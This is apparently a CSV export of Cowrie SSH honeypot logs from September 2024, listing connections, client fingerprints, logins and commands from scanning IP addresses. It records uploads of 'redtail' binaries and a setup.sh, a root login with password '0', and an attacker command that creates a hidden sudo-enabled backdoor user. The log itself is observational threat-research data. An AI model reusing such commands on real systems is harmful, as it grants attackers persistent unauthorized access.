AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""redtail.arm7"",""outfile"":""var/lib/cowrie/downloads/e86081329173be1acc1486a47cee17c9c7b78c50928e7bb9e05a86f1c040a746"",""shasum"":""e86081329173be1acc1486a47cee17c9c7b78c50928e7bb9e05a86f1c040a746"",""message"":""SFTP Uploaded file \""redtail.arm7\"" to var/lib/cowrie/downloads/e86081329173be1acc1486a47cee17c9c7b78c50928e7bb9e05a86f1c040a746"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.968162Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.019 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""redtail.arm8"",""outfile"":""var/lib/cowrie/downloads/88a339d0932322a43a5101d7afad05fa3bbcdbabe62cd5e287daa077398fef97"",""shasum"":""88a339d0932322a43a5101d7afad05fa3bbcdbabe62cd5e287daa077398fef97"",""message"":""SFTP Uploaded file \""redtail.arm8\"" to var/lib/cowrie/downloads/88a339d0932322a43a5101d7afad05fa3bbcdbabe62cd5e287daa077398fef97"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.014741Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.052 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""redtail.i686"",""outfile"":""var/lib/cowrie/downloads/42efa318e298e6069af565b5d09f30d38fc15d7ab1f1361addc9288e5a4e4d98"",""shasum"":""42efa318e298e6069af565b5d09f30d38fc15d7ab1f1361addc9288e5a4e4d98"",""message"":""SFTP Uploaded file \""redtail.i686\"" to var/lib/cowrie/downloads/42efa318e298e6069af565b5d09f30d38fc15d7ab1f1361addc9288e5a4e4d98"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.047776Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.085 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""redtail.x86_64"",""outfile"":""var/lib/cowrie/downloads/eb3032f0ece8e5b1e77842283868b6ce8e003c92ca84f4123e71094b4b9aa18d"",""shasum"":""eb3032f0ece8e5b1e77842283868b6ce8e003c92ca84f4123e71094b4b9aa18d"",""message"":""SFTP Uploaded file \""redtail.x86_64\"" to var/lib/cowrie/downloads/eb3032f0ece8e5b1e77842283868b6ce8e003c92ca84f4123e71094b4b9aa18d"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.079800Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.094 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""setup.sh"",""outfile"":""var/lib/cowrie/downloads/3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae"",""shasum"":""3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae"",""message"":""SFTP Uploaded file \""setup.sh\"" to var/lib/cowrie/downloads/3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.087707Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.105 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":16.612287044525146,""message"":""Connection lost after 16 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.095006Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:52.810 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":52364,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""4188f92af0d3"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:52364 (10.0.0.4:2222) [session: 4188f92af0d3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:52.809401Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:53.444 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:53.443277Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:53.446 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:53.444568Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:55.094 AM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:55.093589Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.475 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.474341Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.476 AM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 aRtxS5DQ) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 aRtxS5DQ) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.475847Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.479 AM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 aRtxS5DQ"",""message"":""CMD: openssl passwd -1 aRtxS5DQ"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.477525Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.481 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 aRtxS5DQ"",""message"":""Command not found: openssl passwd -1 aRtxS5DQ"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.480612Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.486 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.484154Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.538 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.486785Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.879 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/b9effa1884983860b5cf1d96789d066b077c07b85c793e80a07cab1e05fba938"",""size"":725,""shasum"":""b9effa1884983860b5cf1d96789d066b077c07b85c793e80a07cab1e05fba938"",""duplicate"":false,""duration"":0.40526723861694336,""message"":""Closing TTY Log: var/lib/cowrie/tty/b9effa1884983860b5cf1d96789d066b077c07b85c793e80a07cab1e05fba938 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.878874Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.881 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":4.070003986358643,""message"":""Connection lost after 4 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.880714Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:22:14.573 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""140.249.182.238"",""src_port"":33390,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1d8486634081"",""protocol"":""ssh"",""message"":""New connection: 140.249.182.238:33390 (10.0.0.4:2222) [session: 1d8486634081]"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:22:14.572114Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:22:19.672 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":5.0978147983551025,""message"":""Connection lost after 5 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:22:19.671309Z"",""src_ip"":""140.249.182.238"",""session"":""1d8486634081""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:06:26.584 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""143.110.159.157"",""src_port"":37600,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""321c943debf1"",""protocol"":""ssh"",""message"":""New connection: 143.110.159.157:37600 (10.0.0.4:2222) [session: 321c943debf1]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:06:26.582736Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:06:26.617 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:06:26.616987Z"",""src_ip"":""143.110.159.157"",""session"":""321c943debf1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:06:26.727 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""084386fa7ae5039bcf6f07298a05a227"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:06:26.724121Z"",""src_ip"":""143.110.159.157"",""session"":""321c943debf1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:06:31.618 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":5.033411026000977,""message"":""Connection lost after 5 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:06:31.617757Z"",""src_ip"":""143.110.159.157"",""session"":""321c943debf1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:13.913 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""8.221.136.6"",""src_port"":55026,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""a7a91056107a"",""protocol"":""ssh"",""message"":""New connection: 8.221.136.6:55026 (10.0.0.4:2222) [session: a7a91056107a]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:13.912663Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.164 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.2501230239868164,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.164128Z"",""src_ip"":""8.221.136.6"",""session"":""a7a91056107a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.329 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""8.221.136.6"",""src_port"":55030,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9077cde9f6f3"",""protocol"":""ssh"",""message"":""New connection: 8.221.136.6:55030 (10.0.0.4:2222) [session: 9077cde9f6f3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.327976Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.331 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.329746Z"",""src_ip"":""8.221.136.6"",""session"":""9077cde9f6f3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.497 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""98f63c4d9c87edbd97ed4747fa031019"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-256"",""rsa-sha2-512"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.495474Z"",""src_ip"":""8.221.136.6"",""session"":""9077cde9f6f3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.993 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.6627960205078125,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.992361Z"",""src_ip"":""8.221.136.6"",""session"":""9077cde9f6f3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:15:59.501 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""65.49.1.24"",""src_port"":11081,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""f484d3df8dc0"",""protocol"":""ssh"",""message"":""New connection: 65.49.1.24:11081 (10.0.0.4:2222) [session: f484d3df8dc0]"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:15:59.500372Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:15:59.502 PM",,"{""eventid"":""cowrie.client.version"",""version"":""GET / HTTP/1.1"",""message"":""Remote SSH version: GET / HTTP/1.1"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:15:59.501746Z"",""src_ip"":""65.49.1.24"",""session"":""f484d3df8dc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:15:59.503 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.0015974044799804688,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:15:59.503249Z"",""src_ip"":""65.49.1.24"",""session"":""f484d3df8dc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:43.849 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""48.216.193.37"",""src_port"":11384,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""f67ac8981921"",""protocol"":""ssh"",""message"":""New connection: 48.216.193.37:11384 (10.0.0.4:2222) [session: f67ac8981921]"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:43.848307Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:43.850 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-OpenSSH_8.9"",""message"":""Remote SSH version: SSH-2.0-OpenSSH_8.9"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:43.850219Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:43.855 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""af493dba7b79f250d4e61f2d2a34c8da"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,sntrup761x25519-sha512@openssh.com,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-512,hmac-sha2-256;none,zlib@openssh.com,zlib"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""sntrup761x25519-sha512@openssh.com"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group16-sha512"",""diffie-hellman-group18-sha512"",""diffie-hellman-group14-sha256"",""ext-info-c"",""kex-strict-c-v00@openssh.com""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""sk-ssh-ed25519-cert-v01@openssh.com"",""sk-ecdsa-sha2-nistp256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-ed25519"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""sk-ssh-ed25519@openssh.com"",""sk-ecdsa-sha2-nistp256@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256""],""encCS"":[""aes256-ctr"",""aes192-ctr"",""aes128-ctr""],""macCS"":[""hmac-sha2-512"",""hmac-sha2-256""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: af493dba7b79f250d4e61f2d2a34c8da"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:43.853368Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} 